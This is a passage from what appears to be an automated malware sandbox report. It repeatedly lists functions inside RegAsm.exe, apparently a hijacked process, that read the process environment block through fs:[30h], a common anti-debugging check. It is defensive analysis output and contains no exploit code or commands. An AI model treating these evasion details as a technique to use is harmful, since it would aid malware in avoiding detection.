                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CD0274 mov eax, dword ptr fs:[00000030h]4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C57208 mov eax, dword ptr fs:[00000030h]4_2_02C57208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C57208 mov eax, dword ptr fs:[00000030h]4_2_02C57208
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF5227 mov eax, dword ptr fs:[00000030h]4_2_02CF5227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1823B mov eax, dword ptr fs:[00000030h]4_2_02C1823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDC3CD mov eax, dword ptr fs:[00000030h]4_2_02CDC3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A3C0 mov eax, dword ptr fs:[00000030h]4_2_02C2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A3C0 mov eax, dword ptr fs:[00000030h]4_2_02C2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A3C0 mov eax, dword ptr fs:[00000030h]4_2_02C2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A3C0 mov eax, dword ptr fs:[00000030h]4_2_02C2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A3C0 mov eax, dword ptr fs:[00000030h]4_2_02C2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2A3C0 mov eax, dword ptr fs:[00000030h]4_2_02C2A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C283C0 mov eax, dword ptr fs:[00000030h]4_2_02C283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C283C0 mov eax, dword ptr fs:[00000030h]4_2_02C283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C283C0 mov eax, dword ptr fs:[00000030h]4_2_02C283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C283C0 mov eax, dword ptr fs:[00000030h]4_2_02C283C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDB3D0 mov ecx, dword ptr fs:[00000030h]4_2_02CDB3D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C303E9 mov eax, dword ptr fs:[00000030h]4_2_02C303E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDF3E6 mov eax, dword ptr fs:[00000030h]4_2_02CDF3E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF53FC mov eax, dword ptr fs:[00000030h]4_2_02CF53FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E3F0 mov eax, dword ptr fs:[00000030h]4_2_02C3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E3F0 mov eax, dword ptr fs:[00000030h]4_2_02C3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E3F0 mov eax, dword ptr fs:[00000030h]4_2_02C3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C563FF mov eax, dword ptr fs:[00000030h]4_2_02C563FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1E388 mov eax, dword ptr fs:[00000030h]4_2_02C1E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1E388 mov eax, dword ptr fs:[00000030h]4_2_02C1E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1E388 mov eax, dword ptr fs:[00000030h]4_2_02C1E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4438F mov eax, dword ptr fs:[00000030h]4_2_02C4438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4438F mov eax, dword ptr fs:[00000030h]4_2_02C4438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF539D mov eax, dword ptr fs:[00000030h]4_2_02CF539D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C18397 mov eax, dword ptr fs:[00000030h]4_2_02C18397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C18397 mov eax, dword ptr fs:[00000030h]4_2_02C18397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C18397 mov eax, dword ptr fs:[00000030h]4_2_02C18397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C7739A mov eax, dword ptr fs:[00000030h]4_2_02C7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C7739A mov eax, dword ptr fs:[00000030h]4_2_02C7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C433A5 mov eax, dword ptr fs:[00000030h]4_2_02C433A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C533A0 mov eax, dword ptr fs:[00000030h]4_2_02C533A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C533A0 mov eax, dword ptr fs:[00000030h]4_2_02C533A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA2349 mov eax, dword ptr fs:[00000030h]4_2_02CA2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1D34C mov eax, dword ptr fs:[00000030h]4_2_02C1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1D34C mov eax, dword ptr fs:[00000030h]4_2_02C1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF5341 mov eax, dword ptr fs:[00000030h]4_2_02CF5341
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19353 mov eax, dword ptr fs:[00000030h]4_2_02C19353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C19353 mov eax, dword ptr fs:[00000030h]4_2_02C19353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA035C mov eax, dword ptr fs:[00000030h]4_2_02CA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA035C mov eax, dword ptr fs:[00000030h]4_2_02CA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA035C mov eax, dword ptr fs:[00000030h]4_2_02CA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA035C mov ecx, dword ptr fs:[00000030h]4_2_02CA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA035C mov eax, dword ptr fs:[00000030h]4_2_02CA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA035C mov eax, dword ptr fs:[00000030h]4_2_02CA035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CEA352 mov eax, dword ptr fs:[00000030h]4_2_02CEA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CDF367 mov eax, dword ptr fs:[00000030h]4_2_02CDF367
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CC437C mov eax, dword ptr fs:[00000030h]4_2_02CC437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C27370 mov eax, dword ptr fs:[00000030h]4_2_02C27370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C27370 mov eax, dword ptr fs:[00000030h]4_2_02C27370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C27370 mov eax, dword ptr fs:[00000030h]4_2_02C27370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA930B mov eax, dword ptr fs:[00000030h]4_2_02CA930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA930B mov eax, dword ptr fs:[00000030h]4_2_02CA930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA930B mov eax, dword ptr fs:[00000030h]4_2_02CA930B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5A30B mov eax, dword ptr fs:[00000030h]4_2_02C5A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5A30B mov eax, dword ptr fs:[00000030h]4_2_02C5A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5A30B mov eax, dword ptr fs:[00000030h]4_2_02C5A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1C310 mov ecx, dword ptr fs:[00000030h]4_2_02C1C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C40310 mov ecx, dword ptr fs:[00000030h]4_2_02C40310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE132D mov eax, dword ptr fs:[00000030h]4_2_02CE132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE132D mov eax, dword ptr fs:[00000030h]4_2_02CE132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4F32A mov eax, dword ptr fs:[00000030h]4_2_02C4F32A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C17330 mov eax, dword ptr fs:[00000030h]4_2_02C17330
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov ecx, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov ecx, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov ecx, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov ecx, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C370C0 mov eax, dword ptr fs:[00000030h]4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CA20DE mov eax, dword ptr fs:[00000030h]4_2_02CA20DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF50D9 mov eax, dword ptr fs:[00000030h]4_2_02CF50D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C490DB mov eax, dword ptr fs:[00000030h]4_2_02C490DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C450E4 mov eax, dword ptr fs:[00000030h]4_2_02C450E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C450E4 mov ecx, dword ptr fs:[00000030h]4_2_02C450E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1A0E3 mov ecx, dword ptr fs:[00000030h]4_2_02C1A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C280E9 mov eax, dword ptr fs:[00000030h]4_2_02C280E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1C0F0 mov eax, dword ptr fs:[00000030h]4_2_02C1C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C620F0 mov ecx, dword ptr fs:[00000030h]4_2_02C620F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2208A mov eax, dword ptr fs:[00000030h]4_2_02C2208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1D08D mov eax, dword ptr fs:[00000030h]4_2_02C1D08D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C25096 mov eax, dword ptr fs:[00000030h]4_2_02C25096
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4D090 mov eax, dword ptr fs:[00000030h]4_2_02C4D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4D090 mov eax, dword ptr fs:[00000030h]4_2_02C4D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5909C mov eax, dword ptr fs:[00000030h]4_2_02C5909C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE60B8 mov eax, dword ptr fs:[00000030h]4_2_02CE60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE60B8 mov ecx, dword ptr fs:[00000030h]4_2_02CE60B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C22050 mov eax, dword ptr fs:[00000030h]4_2_02C22050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CC705E mov ebx, dword ptr fs:[00000030h]4_2_02CC705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CC705E mov eax, dword ptr fs:[00000030h]4_2_02CC705E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4B052 mov eax, dword ptr fs:[00000030h]4_2_02C4B052
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF5060 mov eax, dword ptr fs:[00000030h]4_2_02CF5060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov ecx, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C31070 mov eax, dword ptr fs:[00000030h]4_2_02C31070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C4C073 mov eax, dword ptr fs:[00000030h]4_2_02C4C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E016 mov eax, dword ptr fs:[00000030h]4_2_02C3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E016 mov eax, dword ptr fs:[00000030h]4_2_02C3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E016 mov eax, dword ptr fs:[00000030h]4_2_02C3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C3E016 mov eax, dword ptr fs:[00000030h]4_2_02C3E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1A020 mov eax, dword ptr fs:[00000030h]4_2_02C1A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C1C020 mov eax, dword ptr fs:[00000030h]4_2_02C1C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE903E mov eax, dword ptr fs:[00000030h]4_2_02CE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE903E mov eax, dword ptr fs:[00000030h]4_2_02CE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE903E mov eax, dword ptr fs:[00000030h]4_2_02CE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE903E mov eax, dword ptr fs:[00000030h]4_2_02CE903E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF51CB mov eax, dword ptr fs:[00000030h]4_2_02CF51CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE61C3 mov eax, dword ptr fs:[00000030h]4_2_02CE61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CE61C3 mov eax, dword ptr fs:[00000030h]4_2_02CE61C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5D1D0 mov eax, dword ptr fs:[00000030h]4_2_02C5D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5D1D0 mov ecx, dword ptr fs:[00000030h]4_2_02C5D1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF61E5 mov eax, dword ptr fs:[00000030h]4_2_02CF61E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C451EF mov eax, dword ptr fs:[00000030h]4_2_02C451EF
